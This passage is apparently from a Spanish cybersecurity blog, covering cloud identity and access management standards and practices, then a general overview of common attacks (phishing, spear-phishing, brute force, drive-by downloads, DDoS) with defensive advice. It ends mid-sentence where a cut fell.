Proveedor de identidad: La fuente de la identidad en la federación. El proveedor de identidad no es siempre la fuente autorizada, pero a veces puede confiar en la fuente autorizada, especialmente si se trata de un agente en el proceso. - Parte que confía: El sistema que se basa en una afirmación de identidad de un proveedor de identidad. Con estos y algunos terminos más que nos iran saliendo, trataremos los principales estándares para la Gestión de Identidad. ### Estandares de Gestión de Identidad y Accesos Cloud Existen bastantes estándares de gestión de identidad y acceso, y muchos de ellos se pueden usar en Cloud. A pesar de la amplia gama de opciones, la industria se está fortaleciendo en un conjunto básico que se ve con mayor frecuencia en varias implementaciones y que cuentan con el respaldo de la mayoría de los proveedores. > Hay algunos estándares que son prometedores pero que aún no se usan con tanta frecuencia. Esta lista no refleja particularidades y tampoco incluye todas las opciones, pero si refleja las opciones que comúnmente son admitidas por una amplia gama de proveedores: - Security Assertion Markup Language (SAML) 2.0: Es un estándar OASIS para la administración de identidades federadas que admite autenticación y autorización. Utiliza XML para realizar afirmaciones entre un proveedor de identidad y una parte dependiente. Las afirmaciones pueden contener declaraciones de autenticación, declaraciones de atributos y declaraciones de decisión de autorización. SAML es ampliamente compatible con la gran mayoria de herramientas empresariales y la Cloud, pero suele ser compleja de configurar inicialmente. - OAuth: Es un estándar de IETF para la autorización que se usa ampliamente para servicios web. OAuth está diseñado para funcionar a través de HTTP y actualmente está en la versión 2.0, que no es compatible con la versión 1.0 por lo que significa que las implementaciones pueden no ser compatibles. Se usa con mayor frecuencia para delegar el control de acceso / autorizaciones entre servicios. - OpenID: Es un estándar para la autenticación federada que es ampliamente compatible con los servicios web. Está basado en HTTP con URLs usadas para identificar el proveedor de identidad y el usuario / identidad (por ejemplo, identity.identityprovider.com). La versión actual es OpenID Connect 1.0 y se ve muy comúnmente en los servicios al consumidor. Hay otros dos estándares que no son tan comunes, pero que pueden ser útiles para la Cloud: - eXtensible Access Control Markup Language (XACML): Es un estándar para definir los atributos basados en controles de acceso / autorizaciones. Es un lenguaje de políticas para definir controles de acceso en una Policy Enforcement Point y luego pasarlos a un punto de aplicación de políticas. Se puede usar con ambos SAML y OAuth ya que resuelve una parte diferente del problema, por ejemplo, decidir qué está permitido hacer en una entidad con un conjunto de atributos, a diferencia de manejar inicios de sesión o delegaciones de autoridad. - System for Cross-domain Identity Management (SCIM): Es un estándar para intercambiar información de identidad entre dominios. Se puede usar para provisionar y desaprovisionar cuentas en sistemas externos y para intercambiar información de atributos. [Imagen: System for Cross-domain Identity Management] 1. El usuario envía su URL OpenID 2. IP y RP establecen secreto compartido 3. Navegador redirigido para obtener el token del proveedor 4. Solicitud de IP para el token del sitio 5. Inicia sesión si es necesario 6. Token devuelto al navegador 7. Token entregado al sitio solicitante [Vídeo](https://www.youtube.com/watch?v=K82MzSl5Bh0) Todo esto no implica que no haya otras técnicas o estándares utilizados en la computación Cloud para identidad, autenticación y autorización. La mayoría de los proveedores Cloud, especialmente IaaS, tienen sus propios sistemas internos de IAM que pueden no utilizar ninguno de estos estándares o que pueden conectarse a una organización que utiliza estos estándares. Por ejemplo, la firma de solicitudes HTTP se usa muy comúnmente para autenticar API REST y las decisiones de autorización son administradas por políticas internas en el lado proveedor Cloud. La firma de la solicitud aún podría admitir SSO a través de SAML, o la API podría estar completamente basada en OAuth, o usar su propio mecanismo de token. Todos se encuentran comúnmente, pero la mayoría de los proveedores en la nube de clase empresarial ofrecen soporte de federación de algún tipo. Los conceptos esenciales al elegir un protocolo de identidad son: - Ningún protocolo es la panacea que soluciona todos los problemas de identidad y control de acceso. - Los protocolos de identidad deben analizarse en el contexto de casos de uso. Por ejemplo, el inicio de sesión único basado en el navegador, las claves API o la autenticación de móvil a Cloud podría llevar a distintos enfoques diferente. - El supuesto operativo clave debería ser que la identidad es un perímetro en sí mismo, al igual que una DMZ. Por lo tanto, cualquier protocolo de identidad debe seleccionarse y diseñarse desde el punto de vista de que puede atravesar un territorio "complicado" y resistir los ataques de los malos. ### Administrar usuarios e identidades para infraestructuras Cloud La parte de "identidad" de la gestión de identidad se centra en los procesos y las tecnologías para registrar, provisionar, propagar, gestionar y desprogramar identidades. Administrar identidades y provisionamiento de los mismos en los sistemas son problemas que la seguridad de la información ha estado abordando durante décadas. No hace muchoo, los administradores TI necesitaban provisionar individualmente a los usuarios en cada sistema interno diferente. Incluso hoy en día, con servidores de directorio centralizados y una variedad de estándares, el verdadero inicio de sesión único para todo es relativamente "extraño", donde los usuarios aún administran un conjunto de credenciales, aunque mucho más pequeño que en el pasado. Los proveedores Cloud y los usuarios de la nube deben comenzar con la decisión fundamental sobre cómo administrar las identidades: - Los proveedores Cloud casi siempre deben administrar identidades internas, identificadores y atributos para los usuarios que acceden directamente al servicio, a la vez que respaldan la federación para que las organizaciones no tengan que provisionar y administrar manualmente todos los usuarios en el sistema del proveedor y emitir credenciales separadas. - Los usuarios de la nube deben decidir dónde quieren administrar sus identidades y qué modelos arquitectónicos y tecnologías desean admitir para integrarse con los proveedores. Como usuario, puedes iniciar sesión en un proveedor y crear todas las identidades en el sistema. Esto no es escalable para la mayoría de las organizaciones, por lo que la mayoría recurre a la federación. Tenga en cuenta que puede haber excepciones en las que tenga sentido mantener todas o algunas de las identidades con el proveedor de la nube aislado, como cuentas de administrador de respaldo para ayudar a resolver problemas con la conexión de identidad federada. Al usar federación, el usuario Cloud debe determinar la fuente autorizada que contiene las identidades únicas que federarán, donde a menudo es un servidor de directorio interno. La siguiente decisión sería si usar directamente la fuente autorizada como proveedor de identidad, usar una fuente de identidad diferente que se alimenta desde la fuente autorizada (como un directorio alimentado desde un sistema de recursos humanos), o integrar un intermediario de identidad. Hay dos arquitecturas posibles, Free-form vs. hub and spoke : [Imagen: Arquitectura Free-form y hub and spoke] - Forma libre: Los proveedores / fuentes de identidad interna (a menudo servidores de directorio) se conectan directamente a los proveedores Cloud. - Hub and Spoke: Los proveedores / fuentes de identidad interna se comunican con un intermediario central o repositorio que luego sirve como el proveedor de identidad para la federación a los proveedores en la nube. Pero la federación directa de servidores de directorios internos en el modelo de forma libre plantea algunos problemas: - El directorio necesita acceso a Internet. Esto puede ser un problema, dependiendo de la topografía existente, o puede violar las políticas de seguridad. - Puede requerir que los usuarios accedan a una VPN de red corporativa antes de acceder a los servicios en la nube. - Dependiendo del servidor de directorio existente, y especialmente si tiene múltiples servidores de directorio en silos organizativos diferentes, la federación a un proveedor externo puede ser compleja y técnicamente difícil. Los Identity broker manejan la federación entre los proveedores de identidad y las partes que confian (que pueden no ser siempre un servicio en la nube). Se pueden ubicar en el borde de la red o incluso en la nube para habilitar SSO web. Los proveedores de identidad no necesitan ubicarse solo en las instalaciones, muchos proveedores Cloud ahora admiten servidores de directorio basados en la nube que admiten la federación internamente y con otros servicios Cloud. Por ejemplo, las arquitecturas más complejas pueden sincronizar o federar una parte de las identidades de una organización para un directorio interno a través de un identity broker y luego a un directorio alojado en Cloud, que luego sirve como un proveedor de identidad para otras conexiones federadas. [Imagen: Identity Broker] Después de determinar el modelo a gran escala, se requieren decisiones arquitectónicas y de proceso para cualquier implementación: - Cómo administrar identidades para código de aplicación, sistemas, dispositivos y otros servicios. Se puede aprovechar el mismo modelo y los mismos estándares, o decidir tomar un enfoque diferente dentro de las implementaciones y aplicaciones en la nube. Por ejemplo, las descripciones anteriores se inclinan hacia los usuarios que acceden a los servicios, pero es posible que no se apliquen por igual a los servicios que se comunican con servicios, sistemas o dispositivos, o para componentes de aplicaciones dentro de una implementación IaaS. - Definir el proceso de aprovisionamiento de identidad y cómo integrarlo en las implementaciones en la nube. También puede haber múltiples procesos de aprovisionamiento para diferentes casos de uso, aunque el objetivo debe ser tener un proceso lo más unificado posible. Si la organización cuenta con un proceso de aprovisionamiento efectivo para la infraestructura tradicional, idealmente debería extenderse a implementaciones en la nube. Sin embargo, si los procesos internos existentes son problemáticos, la organización debería usar el cambio a la Cloud como una oportunidad para construir un proceso nuevo y más efectivo. - Provisionamiento y soporte de implementaciones y proveedores individuales. Debe haber un proceso formal para agregar nuevos proveedores a la infraestructura de IAM. Esto incluye el proceso de establecer cualquier conexión de federación necesaria, así como: Asignación de atributos (incluidos los roles) entre el proveedor de identidad y la parte que confía. Habilitación de monitorización / registro requerido, incluida la supervisión de la seguridad relacionada con la identidad, como el análisis del comportamiento.(Ya hablamos de UEBA, en este aspecto) Construyendo una matriz de derechos Documentar cualquier escenario de desconexión / arreglo en caso de que haya una falla técnica de cualquier parte de la federación (u otras técnicas) utilizada para la relación. Asegurar planes de respuesta a incidentes para potenciales tomas de cuentas, incluidas adquisiciones de cuentas privilegiadas.(El ejemplo de Indra) - Implementar procesos de desprovisionamiento o cambio de titularidad para las identidades y el proveedor Cloud. Con federación, esto requiere trabajar en ambos lados de la conexión. Por último, los proveedores de la nube deben determinar qué estándares de gestión de identidades desean apoyar. Algunos proveedores solo admiten federación, mientras que otros admiten varios estándares de IAM además de su propia administración interna de usuarios / cuentas. Los proveedores que prestan servicios a las empresas deberán admitir una identidad federada y, muy probablemente, SAML. ### Autenticación Cloud y credenciales Autenticación es el proceso de probar o confirmar una identidad. En la autenticación de seguridad de la información se suele referir al acto de un usuario que inicia sesión, pero también se refiere esencialmente a cada vez que una entidad prueba quiénes son y asume una identidad. La autenticación es responsabilidad del proveedor de identidad. El mayor impacto de la computación en la nube en la autenticación es una mayor necesidad de una autenticación sólida mediante múltiples factores. Esto es por dos razones: - El amplio acceso a la red significa que los servicios en la nube siempre se acceden a través de la red y, a menudo, a través de Internet. La pérdida de credenciales podría llevar más fácilmente a la toma de posesión de la cuenta por parte de un atacante, ya que los ataques no están restringidos a la red local. - Un mayor uso de la federación para Single Sign On significa que un conjunto de credenciales puede comprometer una mayor cantidad de servicios en la nube. La autenticación multifactor (MFA) ofrece una de las opciones más sólidas para reducir las adquisiciones de cuentas. No es la panacea, pero depender de un solo factor (contraseña) para los servicios Cloud es un riesgo muy alto. Al usar MFA con federación, el proveedor de identidad puede y debe pasar el estado de MFA como un atributo a la parte que confía. Hay múltiples opciones para MFA(Como vemos en el enlace de Amazon), que incluyen: - Los Hard tokens son dispositivos físicos que generan contraseñas de un solo uso para el ingreso humano o que deben conectarse a un lector. Estas son la mejor opción cuando se requiere el más alto nivel de seguridad. - Los Soft tokens funcionan de manera similar a los Hard tokens, pero son aplicaciones de software que se ejecutan en un teléfono o computadora. Los Soft tokens también son una excelente opción, pero podrían verse comprometidos si el dispositivo del usuario se ve comprometido, y este riesgo debe considerarse en cualquier modelo de amenaza. - Las Out-of-band Passwords son mensajes de texto o de otro tipo que se envían al teléfono de un usuario (generalmente) y luego se ingresan como cualquier otra contraseña de un solo uso generada por un token. Aunque también es una buena opción, cualquier modelo de amenaza debe considerar la interceptación de mensajes, especialmente con SMS. - La biometría está creciendo como una opción, gracias a los lectores biométricos ahora comúnmente disponibles en teléfonos móviles. Para los servicios en la nube, el biométrico es una protección local que no envía información biométrica al proveedor de la nube y, en cambio, es un atributo que se puede enviar al proveedor. Como tal, se debe tener en cuenta la seguridad y la propiedad del dispositivo local. ### Gestión de derechos y accesos Los términos titulación, autorización y control de acceso se superponen y se definen de manera diferente según el contexto. Una autorización es un permiso para hacer algo: Acceder a un archivo o red, o realizar una determinada función, como una llamada API en un recurso en particular. Un control de acceso permite o niega la expresión de esa autorización, por lo que incluye aspectos como asegurar que el usuario esté autenticado antes de permitir el acceso. Un derecho asigna identidades a autorizaciones y cualquier atributo requerido (por ejemplo, el usuario x tiene acceso al recurso y cuando los atributos z tienen valores designados). Comúnmente nos referimos a un mapa de estos derechos como una matriz de derechos. Los derechos a menudo se codifican como políticas técnicas de distribución y cumplimiento. También utilizamos el término gestión de acceso como la parte "A" de IAM y se refiere a todo el proceso de definición, propagación y aplicación de autorizaciones. La nube impacta en los derechos, las autorizaciones y la administración de acceso de múltiples maneras: - Los proveedores y las plataformas Cloud, como cualquier otra tecnología, tendrán su propio conjunto de autorizaciones potenciales específicas para ellos. A menos que el proveedor admita XACML (algo raro en la actualidad), el usuario Cloud generalmente necesitará configurar los derechos dentro de la plataforma directamente. - El proveedor de la nube es responsable de hacer cumplir las autorizaciones y los controles de acceso. - El usuario de la nube es responsable de definir las autorizaciones y configurarlas adecuadamente dentro de la plataforma. - Las plataformas Cloud tienden a tener mayor soporte para el modelo de control de acceso basado en atributos (ABAC - Attribute-Based Access Control) para IAM, que ofrece mayor flexibilidad y seguridad que el modelo de control de acceso basado en roles (RBAC - Role-Based Access Control). RBAC es el modelo tradicional para imponer autorizaciones y se basa en lo que a menudo es un único atributo (un rol definido). ABAC permite decisiones más detalladas y contextuales mediante la incorporación de múltiples atributos, como el rol, la ubicación, el método de autenticación y más. ABAC es el modelo preferido para la administración de acceso Cloud. - Al usar la federación, el usuario de la nube es responsable de asignar los atributos, incluidos los roles y grupos, al proveedor Cloud y asegurarse de que se comunican correctamente durante la autenticación. - Los proveedores de la nube son responsables de admitir atributos granulares y autorizaciones para habilitar ABAC y una seguridad efectiva para los usuarios Cloud. ### Gestión de usuarios privilegiados En términos de controlar el riesgo, pocas cosas son más esenciales que la administración de usuarios privilegiados. Los requisitos mencionados anteriormente para una autenticación sólida deben ser una consideración importante para cualquier usuario con privilegios. Además, se debe implementar la recodificación de la cuenta y la sesión para aumentar la responsabilidad y la visibilidad de los usuarios con privilegios. En algunos casos, será beneficioso para un usuario privilegiado el iniciar sesión a través de un sistema separado y estrictamente controlado que utilize niveles más altos de seguridad para el control de credenciales, certificados digitales, puntos de acceso físicos y lógicamente separados, y/o maquinas de salto. ## Recomendaciones Identidad y Acceso Cloud - Las organizaciones deben desarrollar un plan integral y formal ademas de procesos para gestionar identidades y autorizaciones con servicios Cloud. - Cuando se conecte a proveedores externos de la nube, debemos usar la federación, si es posible, para extender la administración de identidad existente. Tratando de minimizar los silos de identidades en los proveedores que no están vinculados a las identidades internas. - Debemos considerar el uso de intermediarios de identidad cuando nos corresponda. - Los usuarios Cloud son responsables de mantener el proveedor de identidades y definir identidades y atributos. Estos deben basarse en una fuente autorizada. Las organizaciones distribuidas deben considerar el uso de servidores de directorio hospedados en Cloud cuando las opciones disponibles no esten o no cumplan con los requisitos. - Los usuarios Cloud deben usar de forma predeterminada MFA para todas las cuentas cloud externas y enviar el estado de MFA como un atributo cuando usan la autenticación federada. - Las identidades privilegiadas siempre deben usar MFA. - Desarrollar una matriz de derechos para cada proveedor y proyecto Cloud, con énfasis en el acceso a la metaestructura y/o plano de gestión. - Traducir matrices de derechos a políticas técnicas cuando sean compatibles con el proveedor o la plataforma Cloud. - Es preferible ABAC sobre RBAC para computación Cloud. - Los proveedores de nube deben ofrecer tanto identidades internas como federación usando estándares abiertos. - No hay protocolos mágicos: debemos elejir los casos de uso y las restricciones primero y posteriormente elegir los protocolo correctos. --- # Algunos tipos de ataques informáticos URL: https://ciberseguridad.blog/algunos-tipos-de-ataques-informaticos/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-01-03 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > En el mundo actual, prácticamente todos conocemos el significado de un ataque informático o cibernético y cómo perjudica a nuestro negocio. Por esa razón, buscamos prevenir estos ataques e implementamos una serie de medidas en nuestro sistema para que no sea vulnerable. En el mundo actual, prácticamente todos conocemos el significado de un ataque informático o cibernético y cómo perjudica a nuestro negocio. Por esa razón, buscamos prevenir estos ataques e implementamos una serie de medidas en nuestro sistema para que no sea vulnerable. ## Ataques de phising Los ataques de suplantación de identidad (phishing) son el vector principal de los ataques de malware y generalmente están compuestos por un archivo adjunto de correo electrónico malicioso o un correo electrónico con un enlace incrustado y malicioso. Los correos electrónicos de phishing, por lo general, afirman falsamente que son una empresa establecida o legítima. Los correos electrónicos de suplantación de identidad generalmente son fáciles de detectar si sabe lo que está buscando. A menudo tienen una gran cantidad de errores gramaticales y ortográficos y tienden a solicitar información personal o de crédito. Además de eso, generalmente proviene de una fuente que normalmente no requiere esta información, ya tiene la información o generalmente no dirige al usuario hacia enlaces externos por correo electrónico. El Instituto InfoSec reconoce 7 tipos de ataques de phishing : - Sitios web de phishing - Ataques a las redes sociales - Spear-Phishing - Declaraciones de impuestos fraudulentas - Llamadas tlf. Phishy - Charity Phishing - CEO Phishing [Vídeo](https://www.youtube.com/watch?v=AcFG4zyNIRM) ### Casos recientes de phising Una nueva campaña de espionaje sofisticada dirigida a los gobiernos de la OTAN con documentos especialmente diseñados para entregar exploits Flash han sido una de las últimas campañas de phising de este año. La campaña comenzó durante las fiestas de Navidad y Año Nuevo, los hackers usaron un documento Word titulado "Declaración del Secretario General de la OTAN después de una reunión del Consejo OTAN-Rusia" como cebo del engaño. Donde los ataques tienen como objetivo realizar una actividad de reconocimiento en los sistemas. El ataque fue tan sofisticado que los investigadores apodaron el Framework "Matryoshka Doll Reconnaissance Framework". El contenido del documento ha sido copiado de una declaración oficial de la OTAN publicada en su sitio web y el archivo RTF no contiene ningún exploit, ambas circunstancias dificultan a las víctimas detectar el ataque. El documento malicioso contiene una sucesión de objetos incrustados, incluidos objetos OLE y Adobe Flash, que se extraen en un orden específico. "El objeto OLE contiene un objeto Adobe Flash. El objetivo de Adobe Flash es extraer un blob binario incrustado en sí mismo a través de la ejecución de ActionScript" . "Este blob es un segundo objeto Adobe Flash codificado y comprimido. El algoritmo codificado se basa en la compresión XOR y zlib . Este es el segundo Adobe Flash en la carga útil final que se encuentra dentro del documento ". El análisis de la carga útil reveló que su componente más relevante se encuentra en el código ActionScript. La primera acción de ActionScript es contactar con una URL específica. De esta forma, el atacante recopila información sobre el objetivo, incluida la versión del sistema operativo o la versión de Adobe Flash que se utilizan para evaluar las posibilidades de éxito de atacar la máquina o nó. Los datos recopilados pueden permitir al atacante determinar si el sistema infectado es un sandbox o una máquina virtual y detener las operaciones que en la misma se ejecutan. En este punto, el código malicioso realiza dos solicitudes anidadas adicionales que utilizan los datos obtenidos de la respuesta a la solicitud anterior, donde, por último, en la fase final del ataque, se busca, decodifica y ejecuta un exploit Flash. ### Estadisticas - El APWG (Anti-Phishing Working Group) informó que el número de sitios web de phishing aumentó un 250% entre octubre de 2015 y marzo de 2016 . - Según Verizon, el 30% de los mensajes de phishing son abiertos por usuarios específicos y el 12% de esos usuarios hacen clic en el archivo adjunto malicioso o enlace. ## Ataques spear-phising El Spear-phishing es la práctica fraudulenta de enviar correos electrónicos ostensiblemente de un remitente conocido o confiable para inducir a personas específicas a revelar información confidencial. El ataque de phishing Spear se encuentra entre los puntos de entrada más populares de las infracciones de ciberseguridad. Un ataque de spear phishing requiere habilidades avanzadas de pirateo y es muy difícil de detectar porque generalmente dependen de que el usuario final abra un archivo en un correo electrónico personal y específico. Los ataques de Spear phishing normalmente se dirigen a los responsables de la toma de decisiones dentro de una empresa. A menudo pretendiendo ser un colega de confianza, un amigo o una empresa asociada, los propietarios, gerentes y administradores deben estar completamente capacitados y ser concienciados sobre las "tacticas" en estos mensajes ingeniosamente maliciosos. Se comenta que las infraciones de Yahoo empezaron con un spear-phising como factor de ataque ### Casos recientes de phising Hace unos meses, se ha vuelto a conocer una nueva filtración de 32 millones de cuentas, que se uniría a dos ataques reconocidos en los últimos años: uno de más de mil millones de cuentas y otro de 500 millones de cuentas, en 2013 y 2014. Según informa The Next Web, una investigación llevada a cabo por US Securities And Exchange Comission (SEC) ha descubierto que se filtraron más de 32 millones de cuentas de Yahoo. En una entrevista con Ars Technica, el agente del FBI Malcolm Palmore dijo que los piratas informáticos podían usar un correo electrónico de "spear phishing" para obtener las credenciales de los empleados de Yahoo. Los correos electrónicos de spear phishing pueden incluir varias técnicas diseñadas para engañar al destinatario para que renuncie a su información personal. Generalmente, los correos electrónicos de phishing parecen provenir de una fuente confiable. ### Estadisticas -Según un informe de Trend Micro, el 91% de los ciberataques se inician mediante un correo electrónico de spear phishing . -SANS Institute informa que el 95% de todos los ataques a redes empresariales son el resultado de un spear phishing exitoso. -Intel Reports, el 97% de las personas en todo el mundo no puede identificar un ataque mediante un correo electrónico sofisticado de phishing . ### ¿ Cómo defenderse de un ataque phising? Dado el peligro de abrir un correo electrónico de spear phishing, es importante mantener a los usuarios informados y atentos. Aquí hay algunos consejos y mejores prácticas para transmitir que pueden ayudar a protegerlos del spear phishing: -Compruebe dos veces antes de hacer click: se debe recordar a los usuarios que se detengan antes de hacer clic en los enlaces de un correo electrónico y que coloquen el cursor sobre el hipervínculo para ver primero la URL de destino. Los phishers de la lanza a menudo ocultan sus URL en el texto del correo electrónico con cosas como "haga clic aquí para confirmar" o "solo necesitamos más información, rellene este formulario" para hacer que alguien haga clic sin pensarlo. Al pasar el texto enlazado, se mostrará la URL a la que apunta el enlace. Si no es familiar, no haga clic. -Verificar el remitente: una de las tácticas favoritas de los phishing es encontrar una lista de ejecutivos en una empresa y enviar correos electrónicos imitando a esos ejecutivos para que los empleados revelen información delicada. Debemos recordar a los usuarios que si reciben un correo electrónico con una solicitud que parece fuera de lo común, sin importar de quién sea, deben consultar con el remitente para confirmar que es legítimo. Si esa persona dice que no envió un correo electrónico, entonces el problema debe ser informado al CSIRT de inmediato. -Nunca enviar información confidencial por correo electrónico: muy a menudo, los phishing envían correos electrónicos a los empleados y solicitan información confidencial, como contraseñas de usuarios o información de banca corporativa. Enviar esta información por correo electrónico nunca es una buena idea. Asegúrese de que los usuarios lo notifiquen para avisarle si alguien realiza este tipo de solicitudes, ya que es una indicación de que su empresa puede ser blanco de ataques de phishing. -Evitar publicar demasiada información personal online: una parte clave de la estrategia de un phisher es utilizar en línea la información personal que descubren sobre sus posibles objetivos. Debemos recordar a sus usuarios que publicar demasiada información personal públicamente puede ayudar a los atacantes a estafar y romper la seguridad de la empresa. Debemos ser especialmente cuidadosos. -Usar una protección endpoint basada en el comportamiento: si bien hay muchas cosas que puede hacer para ayudar a mantener seguros a sus usuarios, ninguna estrategia, herramienta o comportamiento será efectiva el 100% del tiempo. Tarde o temprano, alguien hará clic en algo que lo abrirá una brecha. El uso de una herramienta de protección de endpoint basada en el comportamiento ayudará a garantizar que, si algo se soluciona, se podrá detectar y detener la infección de malware antes de que cause algún daño. Dadas las ganancias potenciales que los ciberdelincuentes pueden obtener del spear phishing, parece probable que se convierta en un problema mayor. Sin embargo, con las herramientas, la capacitación y la estrategia adecuadas, puede mantener a sus usuarios y su empresa seguros. ## Ataques network-probes Los ataques Network-probes consistenen en la colocación de una sonda de red como intento de obtener acceso a una computadora y sus archivos a través de un punto débil conocido o probable en los sistemas informático. Las sondas de red no son una amenaza inmediata. Sin embargo, sí indican que alguien está instalando su sistema para posibles puntos de entrada como vector para el ataque. Basicamente es un monitor de red que analiza protocolos y tráfico de red en tiempo real. ### ¿Cómo defenderse de ataques Network probes? Una vez se tenga una comprensión exhaustiva y se hayan registrado los eventos de la sonda se deberá alertar a la gerencia y al equipo de seguridad acerca de la sonda para que puedan realizar un análisis forense y tomar decisiones ejecutivas sobre cómo proceder, coordinado todo ello desde el CSIRT. Una vez informado, debemos continuar monitorizando la actividad al colocar sensores de detección de intrusos adicionales en las secciones de la red descubiertas y aprovechar el centro de operaciones , y tratar de determinar qué fue lo que más llamó la atención en un primer lugar, ayudando a prevenir futuras ocurrencias. ## Ataques de fuerza bruta Los ataques de fuerza bruta y Cracking son un método de prueba y error utilizado por los programas de aplicación para decodificar datos cifrados como contraseñas o claves de cifrado de datos (DES), mediante un esfuerzo exhaustivo (utilizando la fuerza bruta) en lugar de emplear estrategias intelectuales o mas sofisticadas. El crackeo de la fuerza bruta básicamente equivale a inyectar continuamente una contraseña hasta que uno lo hace bien, lo que permite la entrada al sitio que se esta atacando. También se realiza mediate medios similares de prueba y error una táctica similar para encontrar páginas ocultas dentro de las webs. ### Casos recientes Los investigadores de la compañía de firewall de comportamiento Preempt han analizado las contraseñas filtradas de LinkedIn para averiguar cuántos eran débiles antes de que se produjera la infracción. Los hallazgos muestran que el 35 por ciento de las contraseñas de LinkedIn filtradas, más de 63 millones y medio, ya eran conocidas por los diccionarios de contraseñas anteriores, haciéndolos vulnerables a descifrar sin conexión por referencia a una lista de palabras de contraseñas conocidas o usadas anteriormente. Además, el 65 por ciento podría romperse fácilmente con la fuerza bruta utilizando hardware estándar de craqueo comercial. Todo esto significa que las técnicas convencionales de uso de caracteres en mayúsculas y minúsculas, símbolos y dígitos (ULSD) para crear contraseñas son menos efectivas. En parte porque los usuarios vuelven a usar contraseñas, pero también porque las rotan, por ejemplo, al agregar dígitos al final. Cualquiera que use la misma contraseña para LinkedIn que para su trabajo u otra cuenta es vulnerable dentro de estas otras cuentas. Desafortunadamente, muchos usuarios no hacen esa conexión. Sabiendo que LinkedIn fue violada, solo cambian su contraseña de LinkedIn, sin darse cuenta de que si están usando esa misma contraseña en otro lugar, también están expuestos en todos esos lugares. Para los equipos de seguridad de TI, esta es una vulnerabilidad adicional con la que tienen que lidiar. De acuerdo con la investigación, las contraseñas de baja complejidad de 10 caracteres, donde solo se aplica la longitud, se pueden dividir en menos de un día utilizando hardware estándar. Las contraseñas de complejidad media con patrones comunes de ULSD, por ejemplo, una mayuscula principal y un número final, se pueden descifrar en menos de una semana. Las contraseñas de alta complejidad que no usan patrones comunes pueden demorar hasta un mes en descifrarse. ### Estadisticas En 2016, los ataques de fuerza bruta se duplicaron con creces en el lapso de dos meses. WordPress tenía niveles especialmente altos de ataques de fuerza bruta . ### ¿Cómo defenderse de ataques de fuerza bruta? Cuando se trata de Windows, el modo de autenticación y la configuración de privacidad de bloqueo son una forma fácil y efectiva de evitar los intentos de ataque mediante fuerza bruta, ya que hacen que el ataque sea más lento. Es importante nunca usar una cuenta de administrador de dominio como una cuenta de conexión de base de datos SQL, ya que podría conducir desde un ataque de fuerza bruta a una condición de denegación de servicio. La vulnerabilidad de autenticación por ataque de fuerza bruta de los servidores SQL carece de funciones que detectan sistemas bajo un ataque de fuerza bruta, lo que lo convierte en una bestia completamente nueva y muy peligrosa. Es una tarea muy difícil proteger una aplicación que requiere privilegios administrativos de nivel de dominio y carece de la capacidad de ejecución en una versión anterior de SQL Server, pudiendo ver el cifrado de la conexión de la base de datos, así como la forma en que se conecta y se autentica en la aplicación. Cada sistema de base de datos y aplicación son un poco diferentes y requieren variaciones de medidas de precaución. Pero como mejor defensa, el segundo factor de autenticacion, abreviado 2FA, es, como su nombre indica, un método para verificar que la persona que está intentando acceder a una cuenta es su verdadero propietario y no alguien que conoce su contraseña o que la esta fozando mediante fuerza bruta. Pongamos un ejemplo muy simple. Para acceder a nuestra casa utilizamos una llave, pero, cuando vamos a dormir, solemos echar un pestillo por si alguien nos ha copiado la llave. El segundo factor es ese pestillo en Internet. De esta forma si alguien conoce nuestra contraseña no podrá acceder a nuestras cuentas si no cuenta con el segundo factor de autenticacion, que suele ser un código numero temporal que se genera de forma aleatoria y tiene validez de, normalmente, 30 segundos. ## Ataques Drive-by download Los ataques Drive-by Download consisten en un programa que se descarga automáticamente a nuestro ordenador sin su consentimiento o incluso con conocimiento pero con desconociemiento. Los ataques Drive-by Download se activan simplemente cuando una víctima hace clic en un enlace que, involuntariamente, inyecta software malicioso en el ordenador u otro dispositivo. El malware que se usa con más frecuencia en los atques Drive-by Download se denomina troyano. ### ¿Cómo defenderse de ataques drive-by download? - Animar a los empleados a mantener su software actualizado o forzar el mismo. La medida más importante para que los departamentos de TI pueden estar protegidos de las malas descargas directas es alentarlos a los empleados a mantener todo su software actualizado, especialmente su software antivirus, sus navegadores y todas sus descargas. complementos y complementos, incluidos Java, Flash y Adobe Acrobat, todo ello si no se lleva un control centralizado o políticas de actualizaciones dentro de la empresa. Asegurar que los empleados estén usando las últimas versiones de sus navegadores y extensiones es crítico ya que muchos empleados ejecutan algunas versiones anteriores. - Debemos instalar software de filtrado web o proxys. Los productos de filtrado web pueden evitar que las personas accedan a sitios comprometidos por las descargas directas. Pueden tener mecanismos incorporados que les permitan detectar si un sitio no es seguro, y si es así, evitar que los usuarios vayan allí. Algunos buscan exploits conocidos e indicadores conocidos de descargas drive-by miestras que otros tienen heurística incorporada que ayuda a determinar si un sitio es seguro. - Instalar NoScript en el navegador Firefox. NoScript es un complemento gratuito de código abierto que permite solo sitios web de confianza para ejecutar JavaScript, Java y Flash. Brandt dice que ejecutar Firefox con NoScript previene "muchas" descargas drive-by. Por lo que se puedo decir, es el único método infalible para prevenir una infección accidental de una PC con Windows por páginas web manipuladas. - Desactivar Java. Debemos deshabilitar JavaScript dentro de los documentos PDF en las preferencias. También es recomendable que los departamentos de TI desinstalen Java de cualquier sistema expuesto a un applet Java malicioso almacenado dentro de un archivo Java Archive que permita que un applet sin firmar tenga potencialmente acceso ilimitado a ejecutar código de Java arbitrario. - Mantener las pestañas en BLADE. BLADE, que significa Block All Drive-By Download Exploits, es un sistema emergente de inmunización de Windows que evita que los exploits de descarga drive-by infecten las máquinas vulnerables de Windows. Está siendo desarrollado por investigadores de Georgia Tech y pronto estará disponible para su descarga. - No otorgar a los usuarios acceso de administrador a los pcs. Al suministrar pcs a los usuarios finales, se crean empleados con cuentas de usuario estándar, no les dan a los usuarios finales acceso administrativo local a sus computadoras. Limitar el acceso administrativo de los usuarios finales a la computadora mitiga el daño que puede causar el malware, aunque esta practica es discutible. ### Estadisticas Los ciberdelincuentes prefieren utilizar sitios web bien establecidos y de alto tráfico para realizar sus ataques. De acuerdo con un estudio de 2012 realizado por Barracuda Labs, más del 50% de todos los sitios que ofrecen descargas drive-by tenían más de cinco años. ## Ataques de denegación de servicio - DDoS Los ataques de Denegación de servicios distribuidos (DDoS) consisten en un intento de hacer que un servicio online no esté disponible al abrumarlo o sobresaturarlo con tráfico de múltiples fuentes. Los ataques DDoS son uno de los ataques más comunes usados para comprometer el sistema de una organización. Son un tipo de ataque DOS que usa múltiples sistemas comprometidos para apuntar a un solo sistema. Estos sistemas comprometidos suelen estar infectados con un troyano y se utilizan para colapsar un servicio en 